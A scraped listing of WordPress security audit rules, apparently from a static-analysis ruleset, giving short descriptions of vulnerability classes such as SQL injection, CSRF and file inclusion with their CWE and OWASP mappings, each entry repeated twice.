wp-file-inclusion-audit
wp-file-inclusion-audit
These functions can lead to Local File Inclusion (LFI) or Remote File Inclusion (RFI) if the data inside is user-controlled. Validate the data properly before passing it to these functions.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
- CWE-73: The software allows user input to control or influence paths of file names that are used in filesystem operations.
- CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)
OWASP:
- A01:2021 - Broken Access Control
- A08:2021 - Software and Data Integrity Failures
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
- CWE-73: The software allows user input to control or influence paths of file names that are used in filesystem operations.
- CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)
OWASP:
- A01:2021 - Broken Access Control
- A08:2021 - Software and Data Integrity Failures
wp-command-execution-audit
wp-command-execution-audit
These functions can lead to command execution if the data inside them is user-controlled. Don’t use the input directly or validate the data properly before passing it to these functions.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
OWASP:
- A03:2021 - Injection
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
OWASP:
- A03:2021 - Injection
wp-code-execution-audit
wp-code-execution-audit
These functions can lead to code injection if the data inside them is user-controlled. Don’t use the input directly or validate the data properly before passing it to these functions.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-94: Improper Control of Generation of Code (‘Code Injection’)
OWASP:
- A03:2021 - Injection
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-94: Improper Control of Generation of Code (‘Code Injection’)
OWASP:
- A03:2021 - Injection
wp-file-download-audit
wp-file-download-audit
These functions can be used to read to content of the files if the data inside is user-controlled. Don’t use the input directly or validate the data properly before passing it to these functions.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-73: External Control of File Name or Path
OWASP:
- A01:2021 - Broken Access Control
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-73: External Control of File Name or Path
OWASP:
- A01:2021 - Broken Access Control
wp-ajax-no-auth-and-auth-hooks-audit
wp-ajax-no-auth-and-auth-hooks-audit
These hooks allow the developer to handle the custom AJAX endpoints.”wp_ajax_action" hook get fires for any authenticated user and "wp_ajax_nopriv_action” hook get fires for non-authenticated users.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-285: Improper Authorization
OWASP:
- A01:2021 - Broken Access Control
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-285: Improper Authorization
OWASP:
- A01:2021 - Broken Access Control
wp-authorisation-checks-audit
wp-authorisation-checks-audit
wp-csrf-audit
wp-csrf-audit
Passing false or 0 as the third argument to this function will not cause the script to die, making the check useless.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-352: Cross-Site Request Forgery (CSRF)
OWASP:
- A05:2021 - Security Misconfiguration
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-352: Cross-Site Request Forgery (CSRF)
OWASP:
- A05:2021 - Security Misconfiguration
wp-open-redirect-audit
wp-open-redirect-audit
This function can be used to redirect to user supplied URLs. If user input is not sanitised or validated, this could lead to Open Redirect vulnerabilities. Use “wp_safe_redirect()” to prevent this kind of attack.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
OWASP:
- A05:2021 - Security Misconfiguration
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
OWASP:
- A05:2021 - Security Misconfiguration
wp-php-object-injection-audit
wp-php-object-injection-audit
If the data used inside the patterns are directly used without proper sanitization, then this could lead to PHP Object Injection. Do not use these function with user-supplied input, use JSON functions instead.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-502: Deserialization of Untrusted Data
OWASP:
- A03:2021 - Injection
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-502: Deserialization of Untrusted Data
OWASP:
- A03:2021 - Injection
wp-sql-injection-audit
wp-sql-injection-audit
Detected unsafe API methods. This could lead to SQL Injection if the used variable in the functions are user controlled and not properly escaped or sanitized. In order to prevent SQL Injection, use safe api methods like “$wpdb->prepare” properly or escape/sanitize the data properly.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
OWASP:
- A03:2021 - Injection
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
OWASP:
- A03:2021 - Injection
wp-file-manipulation-audit
wp-file-manipulation-audit
These functions can be used to delete the files if the data inside the functions are user controlled. Use these functions carefully.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
- CWE-73: The software allows user input to control or influence paths of file names that are used in filesystem operations.
- CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)
OWASP:
- A01:2021 - Broken Access Control
- A08:2021 - Software and Data Integrity Failures
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
- CWE-73: The software allows user input to control or influence paths of file names that are used in filesystem operations.
- CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)
OWASP:
- A01:2021 - Broken Access Control
- A08:2021 - Software and Data Integrity Failures